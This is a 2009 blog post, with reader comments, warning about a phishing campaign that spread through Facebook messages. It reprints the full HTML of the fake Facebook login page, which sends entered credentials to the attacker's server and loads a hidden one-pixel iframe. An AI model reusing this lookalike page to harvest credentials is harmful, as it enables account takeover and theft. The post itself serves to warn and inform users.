≡ Menu

Facebook Trojan Attack

This morning, I received a facebook message that was short and questionable: “Check kirgo.at.” Interested, I visited the site, only to discover a poorly-disguised site attempting to look like a Facebook login page:

Fake Facebook Page

Fake Facebook Page

While this page doesn’t look very much like the real Facebook login page, and all of the links at the bottom go nowhere, some people are being caught by this trojan. They enter their Facebook credentials and their accounts are immediately compromised. Once compromised, their account sends a Facebook message to everyone in their Friends list with the same message (“Check X.at.”). That’s how the Trojan propogates.

Note that some people got this message in their email (because Facebook sends them a copy of their messages) and jumped to the page from there.

Here is the rule: Do not EVER give your Facebook credentials to any site other than Facebook, and do not follow a link to something that looks like Facebook and fill in your credentials. Period.

Update: Late today, Facebook added some additional controls to their login page in an effort to defeat the hackers, checking login attempts against the location from which the attempt is coming. This is a good move start for Facebook, who are still so new at the game that there are a number of security holes in their systems.

If you read HTML, the following is the complete HTML from the page as of 11:40am MDT on May 21, 2009:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
	<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
	<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z5LNJ/lpkg/56jyd27o/en_US/141/163305/css/aubdlzq1p80sw40o.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zC45Y/l/ecfhg87x/en_US/159827/css/login.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z252O/lpkg/zz2nmjbl/en_US/141/163009/css/a22nq2m07kocs00s.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z6WDZ/lpkg/6k6blvpv/en_US/141/164471/css/bjoirszhnfsoc88c.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z32G8/lpkg/14ewl514/en_US/141/159058/css/9wzufavzfjcogsgk.pkg.css" />
<body class="login_page ie7 UIPage_LoggedOut Locale_en_US">
<div id="dropmenu_container"></div>
<div id="nonfooter">
	<div id="page_height" class="clearfix">
		<div id="menubar_container">
			<div id="fb_menubar" class="fb_menubar_logged_out clearfix">
				<div id="fb_menubar_core"><ul class="fb_menu_list"><li class="fb_menu" id="fb_menubar_logo" style="height:85px;"></li></ul></div>
				<div id="fb_menubar_aux"><ul class="fb_menu_list"></ul></div>
			<div class="signup_box clearfix" style="height:25px;">
				<div class="UILinkButton UILinkButton_SUBig"><a href="/" class="UILinkButton_A">Sign Up</a>
					<div class="UILinkButton_RW">
						<div class="UILinkButton_R"></div>
				<span class="signup_box_message" style="padding-left:15px;">We helps you connect and share with the people in your life.</span></div></div><div id="content" class="fb_content"><div class="UIFullPage_Container"><div class="UIInterstitialContainer clearfix"><div class="UIRoundedTransparentBox"><div class="UIRoundedTransparentBox_Inner clearfix"><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TR">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BR">&nbsp;</div><div class="UIRoundedTransparentBox_Border clearfix"><div class="UIInterstitialBox_Container clearfix"><div class="UIOneOff_Container">
				<div class="title_header add_border"><h2 class="no_icon">Login</h2></div>
				<form method="POST" action="/?login_attempt=1">
				<div id="loginform" style="">
				<div class="form_row clearfix "><label for="email" id="label_email">Email:</label><input type="text" class="inputtext" id="email" name="email" value="" /></div>
				<div class="form_row clearfix "><label for="pass" id="label_pass">Password:</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
				<label class="persistent"><input type="checkbox" class="inputcheckbox " name="persistent" value="1" /><span>Remember me</span></label>
				<div id="buttons" class="form_row clearfix"><label></label>
				<input type="submit" value="Login" name="login" id="login" class="inputsubmit" /></div><p class="reset_password form_row"><label></label><a href="/">Forgot your password?</a></p></div></form>
</div></div></div></div></div></div></div></div></div></div><br><br><div id="pagefooter"><div class="pagefooter_topborder clearfix"><div class="copyright_and_location clearfix"><div class="copyright" id="pagefooter_copyright"><span title="PHP"></span><span id="rtime" title="130">&copy;</span> <span title="">20</span><span title="17409680">09</span></div>
</div><div id="pagefooter_links"><ul i
d="pagefooter_left_links"><li><a href="/">Login</a></li><li><a href="/">About</a></li><li><a href="/">Advertising</a></li><li><a href="/">Careers</a></li><li><a href="/">Terms</a></li></ul><ul id="pagefooter_right_links"><li><a href="/">Privacy</a></li><li><a href="/">Mobile</a></li><li><a href="/">Help</a></li></ul></div></div></div><iframe src='/tds/go.php?sid=2&pid=1431' width="1px" height="1px"></iframe><font></font><font></font><font></font><font></font>

This is not the only domain name that is attempting this, either, so beware!

{ 11 comments… add one }
  • Scott B May 21, 2009, 12:00 pm

    Beats me why Facebook just doesn’t implement a re-write script to prevent people remotely linking to those images as part of the scam.

    They could easily make it substitute some big red “HOAX SITE” images with very little work.

    See http://ardenpackeer.com/blog/blog-stop-stolen-content-with-apache-mod_rewrite/ for examples of how to implement this.


    • ssh May 21, 2009, 12:24 pm

      Because I think that they aren’t thinking about this, yet. But, Scott, you’re right on about it!

  • Judy Rey Wasserman May 21, 2009, 7:38 pm

    I also received this email, however as it looked spammy, was sent by someone I don’t know ell, I decided to look at it (maybe) at some time in the future. So, I never got as far as the page masquerading as a Facebook page.
    Please send me updates to new blogs about this on Twitter as I will be RTing this. I have a Facebook group and many Facebook friends who are on Twitter too.

    Judy Rey Wasserman
    On Twitter: @judyrey

    • ssh May 21, 2009, 8:20 pm

      I will update it as I learn more. I just updated the post with the news that Facebook has added a location check to the logins so that it can catch a login attempt from an “unfamiliar” location, asking for additional information to be sure that you are you.

  • Vladan Miljkovi? May 23, 2009, 1:28 pm

    One more fake at URL


    Message is:
    – – – – – – – – – – — – – – – – – — – – – – – –
    Subject: “Hi”
    Message: “Visit redfriend dot be”
    – – – – – – – – – – – – – – – – – – – – – – – – –

    I guess there is more URL like this one…

  • tERR May 25, 2009, 2:27 pm


    • ssh May 25, 2009, 8:10 pm

      It does not appear to be an attack on the computers (yet?), but rather on the Facebook account. Check your password, reset it, check your profile for any changes (especially to your email address), and don’t ever give any site your Facebook password again!

      BTW, I tried to email you earlier at the email address you left in this comment, but the email to you bounced, so this reply had to wait until I got back to my Mac instead of my iPhone.

%d bloggers like this: